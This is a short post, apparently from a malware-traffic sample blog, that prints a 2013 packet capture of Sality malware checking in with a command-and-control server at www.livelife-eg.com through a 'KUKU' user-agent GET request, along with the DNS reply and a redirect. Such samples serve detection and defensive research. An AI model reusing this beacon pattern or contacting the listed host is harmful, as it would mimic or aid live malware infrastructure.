MALWARE – Sality – Historical Traffic Sample User-Agent: KUKU

By | July 25, 2015

2013-02-03 17:24:12.573644 IP 172.16.253.129.1051 > 97.74.182.1.80: Flags [P.], seq 1:135, ack 1, win 64240, length 134

E….S@…9…..aJ…..Pt…OR.LP…….GET /mainh.gif?114ce4=11337960 HTTP/1.1

User-Agent: KUKU v5.06exp =9355466431

Host: www.livelife-eg.com

Cache-Control: no-cache

 

 

2013-02-03 17:24:12.576583 IP 97.74.182.1.80 > 172.16.253.129.1051: Flags [.], ack 135, win 64240, length 0

E..(……z.aJ…….P..OR.Lt..@P………….

2013-02-03 17:24:12.623503 IP 4.2.2.2.53 > 172.16.253.129.53: 64245 2/0/0 CNAME livelife-eg.com., A 97.74.182.1 (67)

E.._……………..5.5.K.m………….www.livelife-eg.com……………………….X..aJ..

2013-02-03 17:24:12.779947 IP 97.74.182.1.80 > 172.16.253.129.1051: Flags [P.], seq 1:365, ack 135, win 64240, length 364

E………y.aJ…….P..OR.Lt..@P…….HTTP/1.1 301 Moved Permanently

Date: Sat, 17 Aug 2013 16:03:46 GMT

Server: Apache

X-Pingback: http://livelife-eg.com/xmlrpc.php

Expires: Wed, 11 Jan 1984 05:00:00 GMT

Cache-Control: no-cache, must-revalidate, max-age=0

Pragma: no-cache

Location: http://livelife-eg.com/mainh.gif?114ce4=11337960

Content-Length: 0

Content-Type: text/html; charset=UTF-8

Share Button

Leave a Reply

Your email address will not be published. Required fields are marked *